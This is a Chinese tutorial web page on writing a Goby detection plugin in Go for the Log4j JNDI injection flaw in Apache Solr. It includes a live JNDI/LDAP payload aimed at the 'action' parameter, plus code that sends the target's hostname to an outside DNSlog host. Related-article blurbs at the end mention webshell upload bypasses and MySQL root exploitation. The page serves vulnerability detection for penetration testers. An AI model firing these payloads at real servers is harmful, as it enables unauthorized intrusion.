网络安全渗透测试使用goby检测log4j漏洞 - 网站

网络安全渗透测试使用goby检测log4j漏洞

分类:安全教程 · 发布时间:2023-05-04 04:19 · 阅读:6429

这篇文章主要为大家介绍了网络安全渗透测试使用goby检测log4j漏洞的过程方法示例有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步

一、前言

前段时间的Log4j漏洞影响很广泛,网上已经公开了很多地方的利用方式,而平时用goby较多,就想利用goby的指纹识别对目标定向检测。这篇文章就从Apache Solr Log4j漏洞为例,教大家如何写goby poc,文章中有错误还请及时指正。

Goby可以通过编写go文件,来实现一些高级的漏洞检测或利用,例如dnslog检测漏洞

详情可查阅goby官方文档:https://cn.gobies.org/docs/exp/index.html

二、漏洞复现

首先了解到漏洞触发点是action参数,

/solr/admin/collections?action=

通过dnslog验证到靶机是存在漏洞。

payload:${jndi:ldap://24x44x.dnslog.cn/a} 

image.png-600

图一:发送payload

image.png-600

图二:dnslog有回显

三、goby poc编写

Goby是通过golang编写的,而一些漏洞检测场景(比如dnslog验证),goby自身的JSON 格式无法满足这一需求,需采用 Golang 编写漏洞代码。

expJson部分

1、首先通过goby poc管理,添加poc,按照goby官方漏洞描述模版说明填写并保存。

image.png-600

图三:自定义poc

2、在goby安装目录的\golib\exploits\user文件夹打开生成的Apache_Solr_Log4j_JNDI_RCE.json文件,如果不需要exp则需把HasExp字段的true改为false。

image.png-600

图四:生成的json文件

3、将生成的json代码(去掉外围大括号)复制到goby漏洞检测golang模板的expJson := {xxx}中。

package exploits import ( //根据需求导入相应的包 "fmt" "git.gobies.org/goby/goscanner/goutils" "git.gobies.org/goby/goscanner/jsonvul" "git.gobies.org/goby/goscanner/godclient" "git.gobies.org/goby/goscanner/scanconfig" "git.gobies.org/goby/httpclient" "strings" "time" ) func init() { expJson := `{ expJson部分 }` ExpManager.AddExploit(NewExploit( goutils.GetFileName(), expJson, nil, //自定义POC函数部分。 nil, //自定义EXP函数, 没有EXP,就写nil, )) } 

goby漏洞检测golang模板

自定义POC函数部分

1、根据官方文档说明

自定义 POC 由一个函数构成,该函数参数分为

jsonvul.JsonVul、httpclient.FixUrl、scanconfig.SingleScanConfig 结构体组成,通过响应 bool 来确认漏洞是否存在。函数模版如下:

func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { return false } 

需要通过编写检测漏洞是否存在的golang代码,检测到漏洞存在则返回true,不存在返回false。

image.png-600

图五:自定义 POC函数部分

checkStr := goutils.RandomHexString(4) 

RandomHexString函数:随机生成指定长度的字符串

checkUrl, isDomain := godclient.GetGodCheckURL(checkStr) 

GetGodCheckURL函数:生成DNSLog地址

uri := "/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D." + checkUrl + "/a%7D" 

漏洞触发点拼接payload

cfg := httpclient.NewGetRequestConfig(uri) //NewGetRequestConfig:构建GET请求自定义配置,返回RequestConfig cfg.VerifyTls = false //忽略ssl验证 cfg.FollowRedirect = false //不跟随跳转 cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") //自定义请求头 httpclient.DoHttpRequest(u, cfg) //DoHttpRequest:构建自定义请求配置,发送请求,返回请求结果HttpResponse 

构建并发送自定义配置的GET请求,返回请求结果HttpResponse

image.png-600

图六:通过代理抓取到goby发送payload的get请求

return godclient.PullExists(checkStr, time.Second*15) 

在一段时间内检测dnslog是否有HTTP请求成功,如果成功返回true,否则返回false。

image.png-600

图七:通过代理抓取到goby检测dnslog是否有HTTP请求成功

image.png-600

图八:漏洞检测成功

注意点:

  • 1、expJson部分GobyQuery查询规则,要保证能匹配到对应目录资产
  • 2、导入goby,发现加载不出poc,需要去检查代码的问题
  • 3、使用goby官方的函数需通过import导入对应的包

当然除了solr还有很多框架,希望大家能从文章中学到一点知识,打磨自己的武器。

以上就是网络安全渗透测试使用goby检测log4j漏洞的详细内容,更多关于使用goby检测log4j漏洞的资料请关注0133技术站其它相关文章!

标签:
网络安全 渗透测试 漏洞检测 goby log4j

相关文章

ARP欺骗原理以及路由器的先天免疫

这篇文章主要介绍了ARP欺骗原理以及路由器的先天免疫,感兴趣的小伙伴们可以参考一下

linux下mysql 5.x得到root密码后的另外一种利用方式

Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。mysql 5.x里面

魔兽世界服务器被DDoS攻击怎么办?DDoS攻击防御方法

魔兽世界服务器被攻击在目前来说也是比较常见的,同行竞争激烈,在官服开放时也遇到过DDOS攻击,要是飞飞没记错是在22年9月14日,从刚开始的身份验证服务器出现问题,到确定是DDOS攻击导致,再到DDOS攻击结束,差不多3个小时时间

封UDP的服务器真的打不了么?封UDP、封海外服务器

很多游戏服务器租用的时候会出现一些封UDP的字眼,网上一些文章也说UDP协议不可靠!为什么要封UDP呢?既然不可靠,为什么有些人还要使用它呢?今天与你们分享一下UDP,希望可以帮助到你们

突破一流拦截 上传限制的方法

在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截

返回分类 返回首页